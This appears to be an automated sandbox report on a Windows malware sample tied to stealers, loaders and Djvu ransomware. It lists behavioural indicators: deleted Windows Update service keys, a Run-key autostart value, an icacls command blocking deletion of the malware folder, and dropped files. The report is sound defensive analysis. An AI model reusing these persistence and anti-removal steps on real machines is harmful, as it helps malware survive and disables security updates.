Analysis Overview
SHA256
6458c5cc912b5b84a54dff8f86841ae3e3dd5fbfc58df3a81be38f421bad3c3a
Threat Level: Known bad
The file 6458c5cc912b5b84a54dff8f86841ae3e3dd5fbfc58df3a81be38f421bad3c3a was found to be: Known bad.
Malicious Activity Summary
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Djvu Ransomware
Raccoon
Detected Djvu ransomware
Modifies security service
SmokeLoader
Lumma Stealer
Amadey
Stops running service(s)
Downloads MZ/PE file
Modifies file permissions
Reads user/profile data of web browsers
Reads user/profile data of local email clients
VMProtect packed file
Executes dropped EXE
Deletes itself
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Accesses 2FA software files, possible credential harvesting
Looks up external IP address via web service
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Launches sc.exe
Program crash
Enumerates physical storage devices
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-04-24 22:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-24 22:01
Reported
2023-04-24 22:03
Platform
win10-20230220-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Amadey
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Lumma Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
Raccoon
RedLine
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Downloads MZ/PE file
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E7D4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E7D4.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\3d47c20d-b680-4e77-937e-ecae7598e425\\EA86.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\EA86.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Notepad\Chrome\updater.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\2756.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\2C1A.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\E7D4.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6458c5cc912b5b84a54dff8f86841ae3e3dd5fbfc58df3a81be38f421bad3c3a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\EFE6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1AF1.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1AF1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1AF1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6458c5cc912b5b84a54dff8f86841ae3e3dd5fbfc58df3a81be38f421bad3c3a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6458c5cc912b5b84a54dff8f86841ae3e3dd5fbfc58df3a81be38f421bad3c3a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\EFE6.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\EFE6.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\E7D4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\E7D4.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6458c5cc912b5b84a54dff8f86841ae3e3dd5fbfc58df3a81be38f421bad3c3a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EFE6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1AF1.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\69C0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oldplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\6458c5cc912b5b84a54dff8f86841ae3e3dd5fbfc58df3a81be38f421bad3c3a.exe
"C:\Users\Admin\AppData\Local\Temp\6458c5cc912b5b84a54dff8f86841ae3e3dd5fbfc58df3a81be38f421bad3c3a.exe"
C:\Users\Admin\AppData\Local\Temp\E7D4.exe
C:\Users\Admin\AppData\Local\Temp\E7D4.exe
C:\Users\Admin\AppData\Local\Temp\E93D.exe
C:\Users\Admin\AppData\Local\Temp\E93D.exe
C:\Users\Admin\AppData\Local\Temp\EA86.exe
C:\Users\Admin\AppData\Local\Temp\EA86.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Users\Admin\AppData\Local\Temp\EFE6.exe
C:\Users\Admin\AppData\Local\Temp\EFE6.exe
C:\Users\Admin\AppData\Local\Temp\EA86.exe
C:\Users\Admin\AppData\Local\Temp\EA86.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\3d47c20d-b680-4e77-937e-ecae7598e425" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\EA86.exe
"C:\Users\Admin\AppData\Local\Temp\EA86.exe" --Admin IsNotAutoStart IsNotTask
